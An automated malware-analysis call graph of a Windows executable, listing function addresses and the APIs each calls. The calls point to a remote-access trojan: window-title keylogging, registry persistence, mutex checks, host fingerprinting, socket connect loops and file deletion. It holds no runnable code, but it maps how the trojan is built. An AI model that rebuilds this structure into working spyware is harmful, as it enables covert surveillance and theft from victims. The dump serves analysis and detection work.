52388->52389 52393 404c0c 52389->52393 52391 404c06 52391->52343 52392->52350 52394 404c16 52393->52394 52396 404c21 52394->52396 52397 404d07 28 API calls 52394->52397 52396->52391 52397->52396 52401 402bee 52398->52401 52400 40263b 52400->52356 52402 402bfb 52401->52402 52404 402c08 std::ios_base::_Ios_base_dtor 52401->52404 52405 4015d8 26 API calls _Deallocate 52402->52405 52404->52400 52405->52404 52410 402c1a 52406->52410 52409->52360 52413 403340 52410->52413 52414 403348 52413->52414 52415 402662 52414->52415 52417 4038c2 52414->52417 52415->52363 52420 4038cb 52417->52420 52421 401eea 26 API calls 52420->52421 52422 4038ca 52421->52422 52422->52414 52423 402bcc 52424 402bd7 52423->52424 52425 402bdf 52423->52425 52431 403315 52424->52431 52426 402beb 52425->52426 52440 4015d3 52425->52440 52432 4015d3 22 API calls 52431->52432 52433 40332a 52432->52433 52434 402bdd 52433->52434 52435 40333b 52433->52435 52450 43a7ac 26 API calls 3 library calls 52435->52450 52437 43a846 52451 43a854 11 API calls _Atexit 52437->52451 52439 43a853 52442 43360d 52440->52442 52441 43a88c _Yarn 21 API calls 52441->52442 52442->52441 52443 402be9 52442->52443 52446 43362e std::_Facet_Register 52442->52446 52452 442200 7 API calls 2 library calls 52442->52452 52445 433dec std::_Facet_Register 52454 437bd7 RaiseException 52445->52454 52446->52445 52453 437bd7 RaiseException 52446->52453 52449 433e09 52450->52437 52451->52439 52452->52442 52453->52445 52454->52449 52455 4339be 52456 4339ca CallCatchBlock 52455->52456 52487 4336b3 52456->52487 52458 4339d1 52459 433b24 52458->52459 52462 4339fb 52458->52462 52787 433b44 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 52459->52787 52461 433b2b 52788 4426be 28 API calls _Atexit 52461->52788 52464 433a3a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 52462->52464 52781 4434d1 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 52462->52781 52472 433a9b 52464->52472 52783 43edf4 38 API calls 3 library calls 52464->52783 52465 433b31 52789 442670 28 API calls _Atexit 52465->52789 52468 433a14 52470 433a1a 52468->52470 52782 443475 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 52468->52782 52469 433b39 52498 433c5e 52472->52498 52481 433abd 52481->52461 52482 433ac1 52481->52482 52483 433aca 52482->52483 52785 442661 28 API calls _Atexit 52482->52785 52786 433842 13 API calls 2 library calls 52483->52786 52486 433ad2 52486->52470 52488 4336bc 52487->52488 52790 433e0a IsProcessorFeaturePresent 52488->52790 52490 4336c8 52791 4379ee 10 API calls 3 library calls 52490->52791 52492 4336cd 52493 4336d1 52492->52493 52792 44335e IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 52492->52792 52493->52458 52495 4336da 52496 4336e8 52495->52496 52793 437a17 8 API calls 3 library calls 52495->52793 52496->52458 52794 436050 52498->52794 52501 433aa1 52502 443422 52501->52502 52796 44ddc9 52502->52796 52504 44342b 52506 433aaa 52504->52506 52800 44e0d3 38 API calls 52504->52800 52507 40d767 52506->52507 52802 41bce3 LoadLibraryA GetProcAddress 52507->52802 52509 40d783 GetModuleFileNameW 52807 40e168 52509->52807 52511 40d79f 52512 401fbd 28 API calls 52511->52512 52513 40d7ae 52512->52513 52514 401fbd 28 API calls 52513->52514 52515 40d7bd 52514->52515 52822 41afc3 52515->52822 52519 40d7cf 52520 401d8c 26 API calls 52519->52520 52521 40d7d8 52520->52521 52522 40d835 52521->52522 52523 40d7eb 52521->52523 52847 401d64 52522->52847 53092 40e986 111 API calls 52523->53092 52526 40d845 52529 401d64 28 API calls 52526->52529 52527 40d7fd 52528 401d64 28 API calls 52527->52528 52532 40d809 52528->52532 52530 40d864 52529->52530 52852 404cbf 52530->52852 53093 40e937 68 API calls 52532->53093 52533 40d873 52856 405ce6 52533->52856 52536 40d87f 52859 401eef 52536->52859 52537 40d824 53094 40e155 68 API calls 52537->53094 52540 40d88b 52541 401eea 26 API calls 52540->52541 52542 40d894 52541->52542 52544 401eea 26 API calls 52542->52544 52543 401eea 26 API calls 52545 40dc9f 52543->52545 52546 40d89d 52544->52546 52784 433c94 GetModuleHandleW 52545->52784 52547 401d64 28 API calls 52546->52547 52548 40d8a6 52547->52548 52863 401ebd 52548->52863 52550 40d8b1 52551 401d64 28 API calls 52550->52551 52552 40d8ca 52551->52552 52553 401d64 28 API calls 52552->52553 52555 40d8e5 52553->52555 52554 40d946 52556 401d64 28 API calls 52554->52556 52571 40e134 52554->52571 52555->52554 53095 4085b4 52555->53095 52562 40d95d 52556->52562 52558 40d912 52559 401eef 26 API calls 52558->52559 52560 40d91e 52559->52560 52563 401eea 26 API calls 52560->52563 52561 40d9a4 52867 40bed7 52561->52867 52562->52561 52568 4124b7 3 API calls 52562->52568 52565 40d927 52563->52565 53099 4124b7 RegOpenKeyExA 52565->53099 52566 40d9aa 52567 40d82d 52566->52567 52870 41a463 52566->52870 52567->52543 52573 40d988 52568->52573 53187 412902 30 API calls 52571->53187 52572 40d9c5 52575 40da18 52572->52575 52887 40697b 52572->52887 52573->52561 53102 412902 30 API calls 52573->53102 52576 401d64 28 API calls 52575->52576 52579 40da21 52576->52579 52588 40da32 52579->52588 52589 40da2d 52579->52589 52581 40e14a 53188 4112b5 64 API calls ___scrt_fastfail 52581->53188 52582 40d9e4 53103 40699d 30 API calls 52582->53103 52583 40d9ee 52587 401d64 28 API calls 52583->52587 52596 40d9f7 52587->52596 52593 401d64 28 API calls 52588->52593 53106 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 52589->53106 52590 40d9e9 53104 4064d0 97 API calls 52590->53104 52594 40da3b 52593->52594 52891 41ae08 52594->52891 52596->52575 52599 40da13 52596->52599 52597 40da46 52895 401e18 52597->52895 53105 4064d0 97 API calls 52599->53105 52601 40da51 52899 401e13 52601->52899 52603 40da5a 52604 401d64 28 API calls 52603->52604 52605 40da63 52604->52605 52606 401d64 28 API calls 52605->52606 52607 40da7d 52606->52607 52608 401d64 28 API calls 52607->52608 52609 40da97 52608->52609 52610 401d64 28 API calls 52609->52610 52612 40dab0 52610->52612 52611 40db1d 52614 40db2c 52611->52614 52619 40dcaa ___scrt_fastfail 52611->52619 52612->52611 52613 401d64 28 API calls 52612->52613 52618 40dac5 _wcslen 52613->52618 52615 40db35 52614->52615 52643 40dbb1 ___scrt_fastfail 52614->52643 52616 401d64 28 API calls 52615->52616 52617 40db3e 52616->52617 52620 401d64 28 API calls 52617->52620 52618->52611 52621 401d64 28 API calls 52618->52621 53166 41265d RegOpenKeyExA 52619->53166 52622 40db50 52620->52622 52623 40dae0 52621->52623 52625 401d64 28 API calls 52622->52625 52627 401d64 28 API calls 52623->52627 52626 40db62 52625->52626 52630 401d64 28 API calls 52626->52630 52628 40daf5 52627->52628 53107 40c89e 52628->53107 52629 40dcef 52631 401d64 28 API calls 52629->52631 52633 40db8b 52630->52633 52634 40dd16 52631->52634 52638 401d64 28 API calls 52633->52638 52913 401f66 52634->52913 52636 401e18 26 API calls 52637 40db14 52636->52637 52640 401e13 26 API calls 52637->52640 52641 40db9c 52638->52641 52640->52611 53164 40bc67 46 API calls _wcslen 52641->53164 52642 40dd25 52917 4126d2 RegCreateKeyA 52642->52917 52903 4128a2 52643->52903 52648 40dc45 ctype 52652 401d64 28 API calls 52648->52652 52649 40dbac 52649->52643 52650 401d64 28 API calls 52651 40dd47 52650->52651 52923 43a5e7 52651->52923 52653 40dc5c 52652->52653 52653->52629 52656 40dc70 52653->52656 52658 401d64 28 API calls 52656->52658 52657 40dd5e 53169 41beb0 87 API calls ___scrt_fastfail 52657->53169 52660 40dc7e 52658->52660 52659 40dd81 52662 401f66 28 API calls 52659->52662 52663 41ae08 28 API calls 52660->52663 52665 40dd96 52662->52665 52666 40dc87 52663->52666 52664 40dd65 CreateThread 52664->52659 54223 41c96f 10 API calls 52664->54223 52667 401f66 28 API calls 52665->52667 53165 40e219 119 API calls 52666->53165 52669 40dda5 52667->52669 52927 41a686 52669->52927 52670 40dc8c 52670->52629 52672 40dc93 52670->52672 52672->52567 52674 401d64 28 API calls 52675 40ddb6 52674->52675 52676 401d64 28 API calls 52675->52676 52677 40ddcb 52676->52677 52678 401d64 28 API calls 52677->52678 52679 40ddeb 52678->52679 52680 43a5e7 _strftime 42 API calls 52679->52680 52681 40ddf8 52680->52681 52682 401d64 28 API calls 52681->52682 52683 40de03 52682->52683 52684 401d64 28 API calls 52683->52684 52685 40de14 52684->52685 52686 401d64 28 API calls 52685->52686 52687 40de29 52686->52687 52688 401d64 28 API calls 52687->52688 52689 40de3a 52688->52689 52690 40de41 StrToIntA 52689->52690 52951 409517 52690->52951 52693 401d64 28 API calls 52694 40de5c 52693->52694 52695 40dea1 52694->52695 52696 40de68 52694->52696 52698 401d64 28 API calls 52695->52698 53170 43360d 22 API calls 3 library calls 52696->53170 52700 40deb1 52698->52700 52699 40de71 52701 401d64 28 API calls 52699->52701 52704 40def9 52700->52704 52705 40debd 52700->52705 52702 40de84 52701->52702 52703 40de8b CreateThread 52702->52703 52703->52695 54226 419128 112 API calls 2 library calls 52703->54226 52706 401d64 28 API calls 52704->52706 53171 43360d 22 API calls 3 library calls 52705->53171 52708 40df02 52706->52708 52712 40df6c 52708->52712 52713 40df0e 52708->52713 52709 40dec6 52710 401d64 28 API calls 52709->52710 52711 40ded8 52710->52711 52716 40dedf CreateThread 52711->52716 52714 401d64 28 API calls 52712->52714 52715 401d64 28 API calls 52713->52715 52717 40df75 52714->52717 52718 40df1e 52715->52718 52716->52704 54225 419128 112 API calls 2 library calls 52716->54225 52719 40df81 52717->52719 52720 40dfba 52717->52720 52721 401d64 28 API calls 52718->52721 52723 401d64 28 API calls 52719->52723 52976 41a7a2 GetComputerNameExW GetUserNameW 52720->52976 52724 40df33 52721->52724 52726 40df8a 52723->52726 53172 40c854 52724->53172 52731 401d64 28 API calls 52726->52731 52727 401e18 26 API calls 52728 40dfce 52727->52728 52730 401e13 26 API calls 52728->52730 52734 40dfd7 52730->52734 52735 40df9f 52731->52735 52733 401e18 26 API calls 52736 40df52 52733->52736 52737 40dfe0 SetProcessDEPPolicy 52734->52737 52738 40dfe3 CreateThread 52734->52738 52744 43a5e7 _strftime 42 API calls 52735->52744 52739 401e13 26 API calls 52736->52739 52737->52738 52740 40e004 52738->52740 52741 40dff8 CreateThread 52738->52741 54194 40e54f 52738->54194 52745 40df5b CreateThread 52739->52745 52742 40e019 52740->52742 52743 40e00d CreateThread 52740->52743 52741->52740 54221 410f36 145 API calls 52741->54221 52747 40e073 52742->52747 52749 401f66 28 API calls 52742->52749 52743->52742 54222 411524 38 API calls ___scrt_fastfail 52743->54222 52746 40dfac 52744->52746 52745->52712 54224 40196b 49 API calls _strftime 52745->54224 53183 40b95c 7 API calls 52746->53183 52987 41246e RegOpenKeyExA 52747->52987 52750 40e046 52749->52750 53184 404c9e 28 API calls 52750->53184 52754 40e053 52756 401f66 28 API calls 52754->52756 52755 40e12a 52999 40cbac 52755->52999 52758 40e062 52756->52758 52757 41ae08 28 API calls 52760 40e0a4 52757->52760 52761 41a686 79 API calls 52758->52761 52990 412584 RegOpenKeyExW 52760->52990 52764 40e067 52761->52764 52765 401eea 26 API calls 52764->52765 52765->52747 52768 401e13 26 API calls 52771 40e0c5 52768->52771 52769 40e0ed DeleteFileW 52770 40e0f4 52769->52770 52769->52771 52773 41ae08 28 API calls 52770->52773 52771->52769 52771->52770 52772 40e0db Sleep 52771->52772 53185 401e07 52772->53185 52775 40e104 52773->52775 52995 41297a RegOpenKeyExW 52775->52995 52777 40e117 52778 401e13 26 API calls 52777->52778 52779 40e121 52778->52779 52780 401e13 26 API calls 52779->52780 52780->52755 52781->52468 52782->52464 52783->52472 52784->52481 52785->52483 52786->52486 52787->52461 52788->52465 52789->52469 52790->52490 52791->52492 52792->52495 52793->52493 52795 433c71 GetStartupInfoW 52794->52795 52795->52501 52797 44ddd2 52796->52797 52799 44dddb 52796->52799 52801 44dcc8 51 API calls 4 library calls 52797->52801 52799->52504 52800->52504 52801->52799 52803 41bd22 LoadLibraryA GetProcAddress 52802->52803 52804 41bd12 GetModuleHandleA GetProcAddress 52802->52804 52805 41bd4b 32 API calls 52803->52805 52806 41bd3b LoadLibraryA GetProcAddress 52803->52806 52804->52803 52805->52509 52806->52805 53189 41a63f FindResourceA 52807->53189 52810 43a88c _Yarn 21 API calls 52811 40e192 ctype 52810->52811 52812 401f86 28 API calls 52811->52812 52813 40e1ad 52812->52813 52814 401eef 26 API calls 52813->52814 52815 40e1b8 52814->52815 52816 401eea 26 API calls 52815->52816 52817 40e1c1 52816->52817 52818 43a88c _Yarn 21 API calls 52817->52818 52819 40e1d2 ctype 52818->52819 53192 406052 52819->53192 52821 40e205 52821->52511 52842 41afd6 52822->52842 52823 41b046 52824 401eea 26 API calls 52823->52824 52825 41b078 52824->52825 52827 401eea 26 API calls 52825->52827 52826 41b048 52829 403b60 28 API calls 52826->52829 52828 41b080 52827->52828 52831 401eea 26 API calls 52828->52831 52832 41b054 52829->52832 52833 40d7c6 52831->52833 52834 401eef 26 API calls 52832->52834 52843 40e8bd 52833->52843 52836 41b05d 52834->52836 52835 401eef 26 API calls 52835->52842 52837 401eea 26 API calls 52836->52837 52839 41b065 52837->52839 52838 401eea 26 API calls 52838->52842 53199 41bfa9 28 API calls 52839->53199 52842->52823 52842->52826 52842->52835 52842->52838 53195 403b60 52842->53195 53198 41bfa9 28 API calls 52842->53198 52844 40e8ca 52843->52844 52846 40e8da 52844->52846 53216 40200a 26 API calls 52844->53216 52846->52519 52848 401d6c 52847->52848 52849 401d74 52848->52849 53217 401fff 28 API calls 52848->53217 52849->52526 52853 404ccb 52852->52853 53218 402e78 52853->53218 52855 404cee 52855->52533 53227 404bc4 52856->53227 52858 405cf4 52858->52536 52860 401efe 52859->52860 52861 401f0a 52860->52861 53236 4021b9 52860->53236 52861->52540 52865 401ec9 52863->52865 52864 401ee4 52864->52550 52865->52864 52866 402325 28 API calls 52865->52866 52866->52864 53240 401e8f 52867->53240 52869 40bee1 CreateMutexA GetLastError 52869->52566 53242 41b15b 52870->53242 52872 41a471 53246 412513 RegOpenKeyExA 52872->53246 52875 401eef 26 API calls 52876 41a49f 52875->52876 52877 401eea 26 API calls 52876->52877 52878 41a4a7 52877->52878 52879 41a4fa 52878->52879 52880 412513 31 API calls 52878->52880 52879->52572 52881 41a4cd 52880->52881 52882 41a4d8 StrToIntA 52881->52882 52883 41a4ef 52882->52883 52884 41a4e6 52882->52884 52886 401eea 26 API calls 52883->52886 53251 41c102 28 API calls 52884->53251 52886->52879 52888 40698f 52887->52888 52889 4124b7 3 API calls 52888->52889 52890 406996 52889->52890 52890->52582 52890->52583 52892 41ae1c 52891->52892 53252 40b027 52892->53252 52894 41ae24 52894->52597 52896 401e27 52895->52896 52898 401e33 52896->52898 53261 402121 26 API calls 52896->53261 52898->52601 52901 402121 52899->52901 52900 402150 52900->52603 52901->52900 53262 402718 26 API calls _Deallocate 52901->53262 52904 4128c0 52903->52904 52905 406052 28 API calls 52904->52905 52906 4128d5 52905->52906 52907 401fbd 28 API calls 52906->52907 52908 4128e5 52907->52908 52909 4126d2 29 API calls 52908->52909 52910 4128ef 52909->52910 52911 401eea 26 API calls 52910->52911 52912 4128fc 52911->52912 52912->52648 52914 401f6e 52913->52914 53263 402301 52914->53263 52918 412722 52917->52918 52919 4126eb 52917->52919 52920 401eea 26 API calls 52918->52920 52922 4126fd RegSetValueExA RegCloseKey 52919->52922 52921 40dd3b 52920->52921 52921->52650 52922->52918 52924 43a600 _strftime 52923->52924 53267 43993e 52924->53267 52928 41a737 52927->52928 52929 41a69c GetLocalTime 52927->52929 52931 401eea 26 API calls 52928->52931 52930 404cbf 28 API calls 52929->52930 52932 41a6de 52930->52932 52933 41a73f 52931->52933 52934 405ce6 28 API calls 52932->52934 52935 401eea 26 API calls 52933->52935 52936 41a6ea 52934->52936 52937 40ddaa 52935->52937 53301 4027cb 52936->53301 52937->52674 52939 41a6f6 52940 405ce6 28 API calls 52939->52940 52941 41a702 52940->52941 53304 406478 76 API calls 52941->53304 52943 41a710 52944 401eea 26 API calls 52943->52944 52945 41a71c 52944->52945 52946 401eea 26 API calls 52945->52946 52947 41a725 52946->52947 52948 401eea 26 API calls 52947->52948 52949 41a72e 52948->52949 52950 401eea 26 API calls 52949->52950 52950->52928 52952 409536 _wcslen 52951->52952 52953 409541 52952->52953 52954 409558 52952->52954 52955 40c89e 32 API calls 52953->52955 52956 40c89e 32 API calls 52954->52956 52957 409549 52955->52957 52958 409560 52956->52958 52959 401e18 26 API calls 52957->52959 52960 401e18 26 API calls 52958->52960 52975 409553 52959->52975 52961 40956e 52960->52961 52962 401e13 26 API calls 52961->52962 52964 409576 52962->52964 52963 401e13 26 API calls 52965 4095ad 52963->52965 53324 40856b 28 API calls 52964->53324 53309 409837 52965->53309 52967 409588 53325 4028cf 52967->53325 52971 409593 52972 401e18 26 API calls 52971->52972 52973 40959d 52972->52973 52974 401e13 26 API calls 52973->52974 52974->52975 52975->52963 53516 403b40 52976->53516 52980 41a7fd 52981 4028cf 28 API calls 52980->52981 52982 41a807 52981->52982 52983 401e13 26 API calls 52982->52983 52984 41a810 52983->52984 52985 401e13 26 API calls 52984->52985 52986 40dfc3 52985->52986 52986->52727 52988 40e08b 52987->52988 52989 41248f RegQueryValueExA RegCloseKey 52987->52989 52988->52755 52988->52757 52989->52988 52991 4125b0 RegQueryValueExW RegCloseKey 52990->52991 52992 4125dd 52990->52992 52991->52992 52993 403b40 28 API calls 52992->52993 52994 40e0ba 52993->52994 52994->52768 52996 412992 RegDeleteValueW 52995->52996 52997 4129a6 52995->52997 52996->52997 52998 4129a2 52996->52998 52997->52777 52998->52777 53000 40cbc5 52999->53000 53001 41246e 3 API calls 53000->53001 53002 40cbcc 53001->53002 53006 40cbeb 53002->53006 53538 401602 53002->53538 53004 40cbd9 53541 4127d5 RegCreateKeyA 53004->53541 53007 413fd4 53006->53007 53008 413feb 53007->53008 53558 41aa73 53008->53558 53010 413ff6 53011 401d64 28 API calls 53010->53011 53012 41400f 53011->53012 53013 43a5e7 _strftime 42 API calls 53012->53013 53014 41401c 53013->53014 53015 414021 Sleep 53014->53015 53016 41402e 53014->53016 53015->53016 53017 401f66 28 API calls 53016->53017 53018 41403d 53017->53018 53019 401d64 28 API calls 53018->53019 53020 41404b 53019->53020 53021 401fbd 28 API calls 53020->53021 53022 414053 53021->53022 53023 41afc3 28 API calls 53022->53023 53024 41405b 53023->53024 53562 404262 WSAStartup 53024->53562 53026 414065 53027 401d64 28 API calls 53026->53027 53028 41406e 53027->53028 53029 401d64 28 API calls 53028->53029 53091 4140ed 53028->53091 53030 414087 53029->53030 53031 401d64 28 API calls 53030->53031 53032 414098 53031->53032 53034 401d64 28 API calls 53032->53034 53033 41afc3 28 API calls 53033->53091 53036 4140a9 53034->53036 53035 401d64 28 API calls 53035->53091 53037 401d64 28 API calls 53036->53037 53039 4140ba 53037->53039 53038 4085b4 28 API calls 53038->53091 53041 401d64 28 API calls 53039->53041 53040 401eef 26 API calls 53040->53091 53042 4140cb 53041->53042 53043 401d64 28 API calls 53042->53043 53044 4140dd 53043->53044 53694 404101 87 API calls 53044->53694 53046 401f66 28 API calls 53046->53091 53047 41a686 79 API calls 53047->53091 53049 414244 WSAGetLastError 53695 41bc76 30 API calls 53049->53695 53056 404cbf 28 API calls 53056->53091 53057 401d64 28 API calls 53059 414b68 53057->53059 53058 401d8c 26 API calls 53058->53091 53059->53057 53060 43a5e7 _strftime 42 API calls 53059->53060 53061 414b80 Sleep 53060->53061 53061->53091 53062 405ce6 28 API calls 53062->53091 53065 4082dc 28 API calls 53065->53091 53066 440c51 26 API calls 53066->53091 53067 401fbd 28 API calls 53067->53091 53068 41265d 3 API calls 53068->53091 53069 412513 31 API calls 53069->53091 53070 403b40 28 API calls 53070->53091 53073 401d64 28 API calls 53074 4144ed GetTickCount 53073->53074 53075 41ad46 28 API calls 53074->53075 53075->53091 53077 41ad46 28 API calls 53077->53091 53079 41aec8 28 API calls 53079->53091 53082 4027cb 28 API calls 53082->53091 53083 40275c 28 API calls 53083->53091 53084 404468 60 API calls 53084->53091 53085 401eea 26 API calls 53085->53091 53086 401e13 26 API calls 53086->53091 53088 414ae4 53697 40a767 84 API calls 53088->53697 53090 414b22 CreateThread 53090->53091 54176 419e89 104 API calls 53090->54176 53091->53033 53091->53035 53091->53038 53091->53040 53091->53046 53091->53047 53091->53049 53091->53056 53091->53058 53091->53059 53091->53062 53091->53065 53091->53066 53091->53067 53091->53068 53091->53069 53091->53070 53091->53073 53091->53077 53091->53079 53091->53082 53091->53083 53091->53084 53091->53085 53091->53086 53091->53088 53091->53090 53563 413f9a 53091->53563 53569 4041f1 53091->53569 53576 404915 53091->53576 53591 40428c connect 53091->53591 53651 41a96d 53091->53651 53654 413683 53091->53654 53657 40cbf1 53091->53657 53663 41adee 53091->53663 53666 41aca0 GetLastInputInfo GetTickCount 53091->53666 53667 41ac52 53091->53667 53672 40e679 GetLocaleInfoA 53091->53672 53675 4027ec 53091->53675 53679 4045d5 53091->53679 53696 404c9e 28 API calls 53091->53696 53698 4047eb WaitForSingleObject 53091->53698 53092->52527 53093->52537 53096 4085c0 53095->53096 53097 402e78 28 API calls 53096->53097 53098 4085e4 53097->53098 53098->52558 53100 4124e1 RegQueryValueExA RegCloseKey 53099->53100 53101 41250b 53099->53101 53100->53101 53101->52554 53102->52561 53103->52590 53104->52583 53105->52575 53106->52588 53108 40c8ba 53107->53108 53109 40c8da 53108->53109 53110 40c90f 53108->53110 53117 40c8d0 53108->53117 54188 41a74b 29 API calls 53109->54188 53113 41b15b 2 API calls 53110->53113 53112 40ca03 GetLongPathNameW 53115 403b40 28 API calls 53112->53115 53116 40c914 53113->53116 53114 40c8e3 53118 401e18 26 API calls 53114->53118 53119 40ca18 53115->53119 53120 40c918 53116->53120 53121 40c96a 53116->53121 53117->53112 53123 40c8ed 53118->53123 53124 403b40 28 API calls 53119->53124 53122 403b40 28 API calls 53120->53122 53125 403b40 28 API calls 53121->53125 53127 40c926 53122->53127 53129 401e13 26 API calls 53123->53129 53128 40ca27 53124->53128 53126 40c978 53125->53126 53133 403b40 28 API calls 53126->53133 53134 403b40 28 API calls 53127->53134 54177 40cc37 53128->54177 53129->53117 53136 40c98e 53133->53136 53137 40c93c 53134->53137 53135 40ca45 53138 402860 28 API calls 53135->53138 53139 402860 28 API calls 53136->53139 53140 402860 28 API calls 53137->53140 53141 40ca4f 53138->53141 53142 40c999 53139->53142 53143 40c947 53140->53143 53144 401e13 26 API calls 53141->53144 53145 401e18 26 API calls 53142->53145 53146 401e18 26 API calls 53143->53146 53147 40ca59 53144->53147 53148 40c9a4 53145->53148 53149 40c952 53146->53149 53150 401e13 26 API calls 53147->53150 53151 401e13 26 API calls 53148->53151 53152 401e13 26 API calls 53149->53152 53153 40ca62 53150->53153 53154 40c9ad 53151->53154 53155 40c95b 53152->53155 53156 401e13 26 API calls 53153->53156 53157 401e13 26 API calls 53154->53157 53158 401e13 26 API calls 53155->53158 53159 40ca6b 53156->53159 53157->53123 53158->53123 53160 401e13 26 API calls 53159->53160 53161 40ca74 53160->53161 53162 401e13 26 API calls 53161->53162 53163 40ca7d 53162->53163 53163->52636 53164->52649 53165->52670 53167 412683 RegQueryValueExA RegCloseKey 53166->53167 53168 4126a7 53166->53168 53167->53168 53168->52629 53169->52664 53170->52699 53171->52709 53173 401f66 28 API calls 53172->53173 53174 40c86b 53173->53174 53175 41ae08 28 API calls 53174->53175 53176 40c876 53175->53176 53177 40c89e 32 API calls 53176->53177 53178 40c887 53177->53178 53179 401e13 26 API calls 53178->53179 53180 40c890 53179->53180 53181 401eea 26 API calls 53180->53181 53182 40c898 53181->53182 53182->52733 53183->52720 53184->52754 53186 401e0c 53185->53186 53187->52581 53190 40e183 53189->53190 53191 41a65c LoadResource LockResource SizeofResource 53189->53191 53190->52810 53191->53190 53193 401f86 28 API calls 53192->53193 53194 406066 53193->53194 53194->52821 53200 403c30 53195->53200 53198->52842 53199->52823 53201 403c39 53200->53201 53204 403c59 53201->53204 53205 403c68 53204->53205 53210 4032a4 53205->53210 53207 403c74 53208 402325 28 API calls 53207->53208 53209 403b73 53208->53209 53209->52842 53211 4032b0 53210->53211 53212 4032ad 53210->53212 53215 4032b6 28 API calls 53211->53215 53212->53207 53216->52846 53219 402e85 53218->53219 53220 402ea9 53219->53220 53221 402e98 53219->53221 53223 402eae 53219->53223 53220->52855 53225 403445 28 API calls 53221->53225 53223->53220 53226 40225b 26 API calls 53223->53226 53225->53220 53226->53220 53228 404bd0 53227->53228 53231 40245c 53228->53231 53230 404be4 53230->52858 53232 402469 53231->53232 53234 402478 53232->53234 53235 402ad3 28 API calls 53232->53235 53234->53230 53235->53234 53238 4021c6 53236->53238 53237 4021e8 53237->52861 53238->53237 53239 40262e 26 API calls 53238->53239 53239->53237 53241 401e94 53240->53241 53243 41b183 53242->53243 53244 41b168 GetCurrentProcess IsWow64Process 53242->53244 53243->52872 53244->53243 53245 41b17f 53244->53245 53245->52872 53247 412541 RegQueryValueExA RegCloseKey 53246->53247 53248 412569 53246->53248 53247->53248 53249 401f66 28 API calls 53248->53249 53250 41257e 53249->53250 53250->52875 53251->52883 53253 40b02f 53252->53253 53256 40b04b 53253->53256 53255 40b045 53255->52894 53257 40b055 53256->53257 53259 40b060 53257->53259 53260 40b138 28 API calls 53257->53260 53259->53255 53260->53259 53261->52898 53262->52900 53264 40230d 53263->53264 53265 402325 28 API calls 53264->53265 53266 401f80 53265->53266 53266->52642 53285 43a545 53267->53285 53269 40dd54 53269->52657 53269->52659 53270 43998b 53294 4392de 38 API calls 3 library calls 53270->53294 53271 439950 53271->53269 53271->53270 53272 439965 53271->53272 53292 445354 20 API calls _Atexit 53272->53292 53275 43996a 53293 43a827 26 API calls _Deallocate 53275->53293 53278 439997 53279 4399c6 53278->53279 53295 43a58a 42 API calls __Tolower 53278->53295 53282 439a32 53279->53282 53296 43a4f1 26 API calls 2 library calls 53279->53296 53297 43a4f1 26 API calls 2 library calls 53282->53297 53283 439af9 _strftime 53283->53269 53298 445354 20 API calls _Atexit 53283->53298 53286 43a54a 53285->53286 53287 43a55d 53285->53287 53299 445354 20 API calls _Atexit 53286->53299 53287->53271 53289 43a54f 53300 43a827 26 API calls _Deallocate 53289->53300 53291 43a55a 53291->53271 53292->53275 53293->53269 53294->53278 53295->53278 53296->53282 53297->53283 53298->53269 53299->53289 53300->53291 53305 401e9b 53301->53305 53303 4027d9 53303->52939 53304->52943 53306 401ea7 53305->53306 53307 40245c 28 API calls 53306->53307 53308 401eb9 53307->53308 53308->53303 53310 409855 53309->53310 53311 4124b7 3 API calls 53310->53311 53312 40985c 53311->53312 53313 409870 53312->53313 53314 40988a 53312->53314 53316 4095cf 53313->53316 53317 409875 53313->53317 53328 4082dc 53314->53328 53316->52693 53318 4082dc 28 API calls 53317->53318 53320 409883 53318->53320 53354 409959 29 API calls 53320->53354 53323 409888 53323->53316 53324->52967 53507 402d8b 53325->53507 53327 4028dd 53327->52971 53329 4082eb 53328->53329 53355 408431 53329->53355 53331 408309 53332 4098a5 53331->53332 53360 40affa 53332->53360 53335 4098f6 53337 401f66 28 API calls 53335->53337 53336 4098ce 53338 401f66 28 API calls 53336->53338 53339 409901 53337->53339 53340 4098d8 53338->53340 53342 401f66 28 API calls 53339->53342 53341 41ae08 28 API calls 53340->53341 53343 4098e6 53341->53343 53344 409910 53342->53344 53364 40a876 31 API calls _Yarn 53343->53364 53346 41a686 79 API calls 53344->53346 53348 409915 CreateThread 53346->53348 53347 4098ed 53349 401eea 26 API calls 53347->53349 53350 409930 CreateThread 53348->53350 53351 40993c CreateThread 53348->53351 53376 4099a9 53348->53376 53349->53335 53350->53351 53373 409993 53350->53373 53352 401e13 26 API calls 53351->53352 53370 4099b5 53351->53370 53353 409950 53352->53353 53353->53316 53354->53323 53506 40999f 136 API calls 53354->53506 53356 40843d 53355->53356 53358 40845b 53356->53358 53359 402f0d 28 API calls 53356->53359 53358->53331 53359->53358 53362 40b006 53360->53362 53361 4098c3 53361->53335 53361->53336 53362->53361 53365 403b9e 53362->53365 53364->53347 53366 403ba8 53365->53366 53368 403bb3 53366->53368 53369 403cfd 28 API calls 53366->53369 53368->53361 53369->53368 53379 40a3f4 53370->53379 53428 4099e4 53373->53428 53449 409e48 53376->53449 53407 40a402 53379->53407 53380 4099be 53381 40a45c Sleep GetForegroundWindow GetWindowTextLengthW 53382 40b027 28 API calls 53381->53382 53382->53407 53385 41aca0 GetLastInputInfo GetTickCount 53385->53407 53387 40a4a2 GetWindowTextW 53387->53407 53389 401e13 26 API calls 53389->53407 53390 40a5ff 53392 401e13 26 API calls 53390->53392 53391 40affa 28 API calls 53391->53407 53392->53380 53393 40a569 Sleep 53393->53407 53396 401f66 28 API calls 53396->53407 53397 40a4f1 53399 4082dc 28 API calls 53397->53399 53397->53407 53412 40a876 31 API calls _Yarn 53397->53412 53399->53397 53401 405ce6 28 API calls 53401->53407 53403 4028cf 28 API calls 53403->53407 53404 41ae08 28 API calls 53404->53407 53405 409d58 27 API calls 53405->53407 53406 401eea 26 API calls 53406->53407 53407->53380 53407->53381 53407->53385 53407->53387 53407->53389 53407->53390 53407->53391 53407->53393 53407->53396 53407->53397 53407->53401 53407->53403 53407->53404 53407->53405 53407->53406 53408 433519 5 API calls __Init_thread_wait 53407->53408 53409 4338a5 29 API calls __onexit 53407->53409 53410 4334cf EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 